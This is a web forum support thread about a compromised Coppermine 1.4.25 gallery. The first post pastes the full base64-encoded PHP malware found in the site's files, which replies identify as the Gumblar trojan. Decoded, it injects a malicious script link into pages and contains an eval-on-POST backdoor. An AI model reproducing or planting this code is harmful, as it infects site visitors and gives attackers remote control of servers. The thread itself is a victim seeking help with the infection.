Trojans on 1.4.25 Trojans on 1.4.25
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Trojans on 1.4.25

Started by bjfs, October 25, 2009, 09:18:19 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

bjfs

So I had a gallery (currently taken down) on 1.4.25 with register globals turned off and for some odd reason the PHP files got infected with this sinister code:

aWYoIWlzc2V0KCR2MHIxKSl7ZnVuY3Rpb24gdjByKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjFwYTNsaGEzVXVhbkF2YldscmVXRnJkVEV2YjNKa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdjByMigkYSwkYiwkYywkZCl7Z2xvYmFsICR2MHIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR2MHIxKSljYWxsX3VzZXJfZnVuYygkdjByMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2MHInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgndjByJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHYwcmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3YwcjInKSkhPSd2MHIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=


Which decodes to evaluation of some nasty site-wide infections of HTML, HTM and JS files with a link to a trojan in the mikyaku.jp domain.

The only mod I used was the captcha one. I tried many things, upgrading from 1.4.34 (wiping the whole code first, where only albums remain) and realising that the host had register globals on by default.

I'm tired of cleaning the site with global search and replace, re-installing and having the incident happen again after a week or two. Maybe 1.5 will be better  :P

There is no link because the gallery is dead.

phill104

Coppermine may not be the rout the hackers got in. There are many methods. What other php driven software do you have installed, have you been a victim of an attack before and not fully cleaned up, are you on a shared host whete somebody elses site was the one at risk but the scumbag managed access to the whole server. As you can see, it is very hard to se exactly where the problem occured without more information.

If possible, get yuor host to check the server logs as these should help track down where the leak was. If it can be show that coppermine was the point of entry, please post details here so we can look into it.
It is a mistake to think you can solve any major problems just with potatoes.

Joachim Müller

Sounds like the Trojan Gumblar in action on your site (I figured this out searching for mikyaku.jp, which lead to http://www.malwaredomainlist.com/update.php). While it's sad to hear that your site got infected, there is no saying how the attack was carried out, so you can not (yet) blame coppermine to be the weakness where the attacker got in.

Here are some articles on Gumblar:
To me it seems that attack is carried out using FTP access. In other words: the attackers retrieved your FTP data (maybe they have been trivial or your PC is infected and subsequently you have fallen victim to a keylogger). Therefore, probably it was not a weakness in coppermine that let the attacker in. Please be very carefull when blaming people to provide buggy code, especially if you don't have the skills to judge.

Joachim

bjfs

Right. So the only PHP file left was just outputting the service closure text and few hours later again the malicious code was added to it. Oh well, this is what you get while having a shared host and share account with other people. Make lame rants on the society with a death wish after one is out of ideas. Ok, so I'm lame today. Happens ::)